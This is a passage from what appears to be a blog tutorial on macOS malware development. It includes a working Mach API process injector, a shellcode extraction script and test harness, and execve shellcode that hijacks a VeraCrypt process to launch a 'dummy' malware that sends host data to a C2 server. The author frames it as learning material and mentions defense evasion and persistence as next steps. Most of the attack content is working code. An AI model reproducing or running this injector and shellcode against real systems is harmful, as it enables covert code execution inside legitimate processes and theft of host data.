`\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a`
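Before trusting a dump like this, it helps to check that the bytes match the assembly. The sketch below decodes the jmp and call displacements and pulls out the embedded string. The offsets (1, 14, 32, 33) are my own reading of this particular byte sequence, not something any tool guarantees, so treat them as assumptions.

```python
import struct

# The bytes from the dump above, grouped for readability.
SHELLCODE = bytes.fromhex(
    "eb 1e 5e b8 04 00 00 02 bf 01 00 00 00 ba 0e 00 00 00 0f 05 "
    "b8 01 00 00 02 bf 00 00 00 00 0f 05 e8 dd ff ff ff "
    "48 65 6c 6c 6f 20 57 6f 72 6c 64 21 0d 0a"
)

# jmp short: opcode 0xEB plus a signed 8-bit displacement,
# relative to the end of the 2-byte instruction.
jmp_target = 2 + struct.unpack_from("<b", SHELLCODE, 1)[0]

# call: opcode 0xE8 plus a signed 32-bit displacement,
# relative to the end of the 5-byte instruction.
call_offset = jmp_target
return_address = call_offset + 5
call_target = return_address + struct.unpack_from("<i", SHELLCODE, call_offset + 1)[0]

# mov edx, imm32 (opcode 0xBA at offset 13) holds the length passed to write.
write_len = struct.unpack_from("<I", SHELLCODE, 14)[0]

# The address pushed by call is where the string starts.
message = SHELLCODE[return_address:return_address + write_len]

if __name__ == "__main__":
    print(len(SHELLCODE), jmp_target, call_target, message)
```

The jmp lands on the call, the call returns control to the pop rsi at offset 2, and the address it pushed points at the 14 bytes passed to write.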

If, for some reason, you can’t extract the shellcode with objdump and shell tools alone, you can always throw together a short Python script that parses the disassembly from standard input:

import re
import sys

def extract_shellcode(objdump_output):
    # Returns the escaped shellcode string and the number of bytes found.
    shellcode = ""
    length = 0
    lines = objdump_output.split('\n')

    for line in lines:
        # Disassembly lines start with an address and a colon,
        # followed by the instruction bytes.
        if re.match("^[ ]*[0-9a-f]*:.*$", line):
            line = line.split(":")[1].lstrip()
            x = line.split("\t")
            opcode = re.findall("[0-9a-f][0-9a-f]", x[0])
            for i in opcode:
                shellcode += "\\x" + i
                length += 1

    return shellcode, length

def main():
    objdump_output = sys.stdin.read()
    shellcode, length = extract_shellcode(objdump_output)

    if shellcode == "":
        print("Bad")
    else:
        print("\n" + shellcode)

if __name__ == "__main__":
    main()

But does the shellcode work? To find out, we can test it locally before injecting it anywhere. One way is to embed the bytes in a small C program as a global array placed in the executable’s __TEXT,__text section, then call it through a function pointer:

const char output[] __attribute__((section("__TEXT,__text"))) =
    "\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01"
    "\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05"
    "\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00"
    "\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c"
    "\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a";

typedef int (*funcPtr)();

int main(int argc, char **argv)
{
    funcPtr ret = (funcPtr) output;
    (*ret)();

    return 0;
}

Alright, now that we have the shellcode, let’s start writing the actual injector. The main function is the natural starting point, and the logic is simple: we take a single command-line argument, the process ID (PID) of the target process. We obtain a handle to the target’s task with task_for_pid(), then allocate memory in the remote task with mach_vm_allocate(), once for a stack and once for the shellcode. We write the shellcode into the remote buffer with mach_vm_write() and change the buffer’s memory protections with vm_protect() so it can be executed. Finally, we create a thread in the remote task with thread_create(), point its context at the start of the shellcode with thread_set_state(), and start it with thread_resume(), which runs the shellcode and prints “Hello World”.

Remember our earlier discussion about the differences between a Mach task thread and a BSD pthread, and about the task_for_pid() API call: a utility that relies on task_for_pid() needs elevated privileges, which is why, as noted at the start, most of these techniques require root access to work.

Note: not all sections of a program’s virtual memory permit their contents to be interpreted as code by the CPU (i.e., “marked executable”). Memory can be marked as readable (R), writable (W), executable (E), or some combination of the three. For instance, a page marked RW means one can read/write to these addresses in memory, but their contents may not be treated as executable by the CPU.

Executable memory regions are typically marked with the execute (E) permission, allowing the CPU to interpret the contents of these regions as machine instructions and execute them. This is essential for running programs, as the CPU needs to fetch instructions from memory and execute them.

However, allowing arbitrary memory regions to be executable can pose significant security risks, such as buffer overflow attacks or injection of malicious code. Therefore, modern operating systems employ memory protection mechanisms to restrict the execution of code to specific, authorized regions of memory.

By controlling the permissions of memory pages, operating systems can enforce security policies and prevent unauthorized execution of code. For example, writable memory regions that contain data should not be executable to prevent the execution of injected code. Conversely, executable code should not be writable to prevent tampering with the program’s instructions.
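To make the permission combinations concrete, here is a small sketch that treats a protection value as a bit mask. The three constants match the Mach VM_PROT_* values. The helper names describe and is_writable_and_executable are made up for illustration.

```python
# Mach protection bits (values as defined in <mach/vm_prot.h>).
VM_PROT_READ = 0x1
VM_PROT_WRITE = 0x2
VM_PROT_EXECUTE = 0x4


def describe(prot: int) -> str:
    """Render a protection mask as a three-letter string such as 'R-E'."""
    flags = ((VM_PROT_READ, "R"), (VM_PROT_WRITE, "W"), (VM_PROT_EXECUTE, "E"))
    return "".join(letter if prot & bit else "-" for bit, letter in flags)


def is_writable_and_executable(prot: int) -> bool:
    """True when a page could be both modified and run, the risky combination."""
    return bool(prot & VM_PROT_WRITE) and bool(prot & VM_PROT_EXECUTE)


if __name__ == "__main__":
    for prot in (VM_PROT_READ | VM_PROT_WRITE, VM_PROT_READ | VM_PROT_EXECUTE):
        print(describe(prot), is_writable_and_executable(prot))
```

A data page typically looks like RW- and a code page like R-E. A page that is writable and executable at the same time is the combination these protections are meant to rule out.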

Alright, the entry point converts the PID provided as a string to an integer and calls the inject_shellcode function to inject the shellcode into the target process with that PID.

We need to interact with the target process, so we declare a few variables to hold essential information. These include remote_task to represent the task port of the target process, remote_stack to store the address of the allocated memory for the remote stack within the target process, and shellcode_region to keep track of the memory region allocated for the shellcode.

Now, the process begins. We need to get permission to access the target process, so we use the task_for_pid function to obtain the task port. This allows us to manipulate the memory and threads of the target process.

With access granted, we proceed to allocate memory within the target process. We reserve space for both the remote stack and the shellcode using mach_vm_allocate, which gives us a place to execute our code. Once memory is allocated, we write our shellcode into the target process using mach_vm_write, which simply places our code where it needs to be executed.

// inject_shellcode
// 	 Inject shellcode into a target process. Allocate memory, write 
//          shellcode, set protections, and spawn a thread to execute it.
// Params:
//    pid_t pid                 - Target process ID.
//    unsigned char *shellcode  - Pointer to shellcode to inject.
//    size_t shellcode_size     - Size of shellcode in bytes.
// Returns: int                 - 0

int inject_shellcode(pid_t pid, unsigned char *shellcode, size_t shellcode_size) {
    task_t remote_task;                     
    mach_vm_address_t remote_stack = 0;   
    vm_region_t shellcode_region;          

    // Grab the task port for the given PID.
    task_for_pid(mach_task_self(), pid, &remote_task);
    mach_vm_allocate(remote_task, &remote_stack, STACK_SIZE, VM_FLAGS_ANYWHERE);

    // Allocate memory for the shellcode
    mach_vm_allocate(remote_task, &shellcode_region.addr, shellcode_size, VM_FLAGS_ANYWHERE);
    shellcode_region.size = shellcode_size;                     
    shellcode_region.prot = VM_PROT_READ | VM_PROT_EXECUTE;

    // Write the shellcode to the allocated memory.
    mach_vm_write(remote_task, shellcode_region.addr, (vm_offset_t)shellcode, shellcode_size);
    vm_protect(remote_task, shellcode_region.addr, shellcode_region.size, FALSE, shellcode_region.prot);

    // Create a remote thread to run the shellcode.
    x86_thread_state64_t thread_state;
    memset(&thread_state, 0, sizeof(thread_state));               
    thread_state.__rip = (uint64_t)shellcode_region.addr;         
    thread_state.__rsp = (uint64_t)(remote_stack + STACK_SIZE);   
    
    thread_act_t remote_thread;
    thread_create(remote_task, &remote_thread);             

    // Set the thread state to start execution.
    thread_set_state(remote_thread, x86_THREAD_STATE64, (thread_state_t)&thread_state, x86_THREAD_STATE64_COUNT);
    thread_resume(remote_thread);                           

    printf("[+] Shellcode injected successfully!\n");
    mach_port_deallocate(mach_task_self(), remote_thread);         

    return 0; 
}

To ensure that our shellcode can run, we modify the memory permissions of the allocated memory region containing the shellcode. We use vm_protect to set the appropriate permissions, allowing for execution. Now, it’s time to execute our shellcode. We create a remote thread within the target process using thread_create. This thread will be responsible for running our injected code.

Before we start the thread, we need to set its state. We prepare the thread to execute our shellcode by setting the instruction pointer (rip) to the starting address of the shellcode and the stack pointer (rsp) to the allocated remote stack. Finally, we’re ready to execute our shellcode. We resume the remote thread using thread_resume, allowing it to begin executing the injected code.

If everything goes smoothly, we print a success message indicating that the shellcode was injected successfully. We also clean up any resources used during the injection process by deallocating Mach ports. And that’s the entire process of injecting shellcode into a target process on macOS using Mach APIs.

In our injector, we’re injecting shellcode into a target process using Mach APIs on macOS, and one significant difference between POSIX threads and Mach threads comes into play here. POSIX threads rely on a thread local storage (TLS) data structure, which is crucial for managing thread-specific data. Mach threads don’t have this concept of TLS.

So when we create a remote thread to execute our shellcode, we can’t simply set the instruction pointer in the thread context struct and expect everything to work smoothly. Our shellcode is essentially unmanaged code that needs a controlled environment, and going straight from a bare Mach thread to executing it might cause issues.

To prevent crashes or errors, the shellcode should run within the context of a fully-fledged POSIX thread. This means that, as part of the injection process, we have to promote execution from a base Mach thread to a POSIX thread. That gives the injected code a more stable environment, so that when the target process starts executing our shellcode in user mode, it does so without crashes or unexpected behavior.

However, let’s shift our focus now. Remember the code we previously developed to transmit system data to the C2 server? What if we inject shellcode into the VeraCrypt process to execute our dummy malware, enabling it to establish communication with the C2 server and transmit host data?

A quick note: the version of VeraCrypt used here for this example is quite old, so any protection we discussed or covered doesn’t apply to this version. We’ll talk a little more about this in part 0x02.

To execute a shell command, considering I’m running zsh, we need to trigger a syscall to run /bin/zsh -c. For this, we use execve, which executes the program referenced by its pathname argument. In our case that program is /bin/zsh, and the path to our dummy malware executable is passed to it as the command string after -c.

Alright, let’s proceed by writing a simple assembly code to execute /bin/zsh -c '/Users/foo/dummy'. First, we’ll set up a register (rbx) and load the string '/bin/zsh' into it. Once this string is pushed onto the stack, we’ll proceed to load the ASCII values for -c into the lower 16 bits of the rax register. After pushing this -c flag onto the stack, we’ll set the rbx register to point to the -c flag on the stack, as it will be necessary later during the syscall preparation.

Any additional details are described in comments within the code. At the end of the first block, there’s a short jump to the dummy label. The call instruction there transfers control to the exec subroutine and, in doing so, pushes the address of the command string onto the stack, which completes the argument array before the system call is made.

global _main

_main:
    xor rdx, rdx        ; Clear rdx register (NULL)
    push rdx            ; Push NULL onto stack (String terminator)
    mov rbx, '/bin/zsh' ; Load '/bin/zsh' into rbx
    push rbx            ; Push '/bin/zsh' onto stack
    mov rdi, rsp        ; Set rdi to point to '/bin/zsh\0'
    xor rax, rax        ; Clear rax register
    mov ax, 0x632D      ; Load "-c" into lower 16 bits of rax
    push rax            ; Push "-c" onto stack
    mov rbx, rsp        ; Set rbx to point to "-c"
    push rdx            ; Push NULL onto stack (end of argv)
    jmp short dummy     ; Jump to label dummy

exec:
    push rbx            ; Push pointer to "-c" (argv[1])
    push rdi            ; Push pointer to '/bin/zsh' (argv[0])
    mov rsi, rsp        ; Set rsi to point to the argv array
    push 59             ; Push syscall number (execve = 59)
    pop rax             ; Pop syscall number into rax
    bts rax, 25         ; Set bit 25 (0x2000000, the Unix syscall class)
    syscall             ; Invoke syscall

dummy:
    call exec                   ; Call exec; pushes the string address (argv[2])
    db '/Users/foo/dummy_m', 0  ; Command string passed to zsh -c
    push rdx                    ; Push NULL onto stack
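A few of the constants in this listing are easier to trust once you reproduce them by hand. The sketch below shows how an 8-byte string fits in a single 64-bit register, why 0x632D reads as "-c" in memory, and what bts rax, 25 does to the syscall number. The helper name pack_qword is made up for illustration.

```python
import struct


def pack_qword(text: bytes) -> int:
    """Little-endian value a 64-bit register holds for up to 8 bytes of text."""
    if len(text) > 8:
        raise ValueError("does not fit in one 64-bit register")
    return int.from_bytes(text.ljust(8, b"\x00"), "little")


# '/bin/zsh' is exactly 8 bytes, so one mov/push pair places it on the stack.
SHELL = pack_qword(b"/bin/zsh")

# x86 is little-endian: 0x632D is stored as 0x2D ('-') then 0x63 ('c').
DASH_C = struct.pack("<H", 0x632D)

# bts rax, 25 sets bit 25, turning 59 (execve) into the full macOS number.
EXECVE = 59 | (1 << 25)

if __name__ == "__main__":
    print(hex(SHELL), DASH_C, hex(EXECVE))
```

Because rax is cleared before mov ax, 0x632D, the pushed quadword is "-c" followed by six zero bytes, which is why that string needs no separate terminator.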

Alright, it’s time to try this beauty. As usual, we’ll need to extract the shellcode and test it before using it. And just like that, bingo! We’ve successfully injected our shellcode, triggering our dummy malware. We’re now receiving host information in the C2 server. We can push this further, even achieve persistence, but I think that’s enough for now.

Executing and sending host information essentially does nothing harmful to your computer. “Dummy” is more about demonstrating how malware can be triggered and how it uses injection techniques to spread. It’s also interesting for defense evasion or adding backdoor capabilities. This was just a quick look at the Mach API, covering system calls and code injection techniques, and how an attacker can use something like process injection to achieve malicious behavior. In this example, we’ve used a legitimate process to inject and execute “malicious code,” potentially exposing host data to an attacker. This can be pushed further, but we’re here just to learn, and I encourage you to experiment with caution. Code injection must be used with care.

All the code used here can be found on GitHub.

Go on, Part II .. macOS Malware Development 0x02

END

In conclusion, I hope you’ve enjoyed and learned from this article. We covered a lot about macOS architecture and APIs, even though we only touched on the basics. By exploring various techniques and writing simple code with the Mach API, we delved into key concepts like code injection and saw some macOS syscalls in action. In the next part, we may cover anti-analysis techniques, persistence, TCC, in-memory execution, and some other tricks as well. Until next time!